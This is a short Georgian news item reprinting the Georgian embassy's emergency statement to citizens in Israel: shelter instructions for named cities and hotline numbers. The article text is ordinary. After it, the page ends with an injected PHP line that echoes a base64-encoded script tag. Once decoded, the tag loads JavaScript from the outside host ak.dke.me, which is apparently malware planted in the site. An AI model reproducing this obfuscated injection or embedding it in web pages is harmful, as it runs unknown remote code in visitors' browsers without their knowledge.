celsiusi
ავერსი საქკაბელი

საქართველოს საელჩო მორიგ საგანგებო განცხადებას ავრცელებს. საინფორმაციო სააგენტო BUSINESS TIME განცხადების ტექსტს უცვლელად გთავაზობთ. 

 
"განსაკუთრებული სიფრთხილისკენ მოგიწოდებთ შემდეგ ქალაქებში მცხოვრებ მოქალაქეებს: აშკელონი, რიშონ ლეციონი, აშდოდი, ხოლონი, ბათ იამი, თელ ავივი, ჰერცელია, რამათ განი, გივატაიმი, ბნეიბრაკი, (სრულად ქვეყნის ცენტრის) ბეერშევა ნეტივოტი, ნეთანია. გავრცელებული მუქარის თანახმად, თავდასხმები ინტენსიურად ამ ქალაქებზე განხორციელდება. არ დატოვოთ საცხოვრებელი ადგილი ! შედით დაცულ ოთახში. თუ ასეთი არ არსებობს - კიბის შიდა უჯრედში ან თავშესაფარში. შეინარჩუნეთ სიმშვიდე. ჩვენთვის ცნობილი გახდა, რომ გაფრთხილების და მოწოდების მიუხედავად, ჩვენი მოქალაქეების ნაწილი მაინც არ იკავებს თავს გარე პერიმეტრზე გასვლისგან! დაბეჯითებით გაფრთხილებთ! ვითარება არის სერიოზულად მძიმე და არაპროგნოზირებადი ! მოგიწოდებთ, დაიცვათ უსაფრთხოების ზომები! 
 
 შეგახსენებთ საელჩოს ცხელი ხაზის ტელეფონის ნომრებს: 0526919092 დავით ჩაჩავა 0528888513 მიხეილ ბაბლუანი 0548620270 ნინო ჩანტლაძე ხაზის დაზიანების შემთხვევაში, გამოიყენეთ ვოთსაფ ან ვაიბერ აპლიკაციები. შეგიძლიათ მოიწეროთ საელჩოს ფეისბუქ მესენჯერშიც. მშვიდობას ვუსურვებთ ისრაელის სახელმწიფოს და მშვიდობიან ღამეს გისურვებთ."- წერია განცხადებაში. 
 
 
1177
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");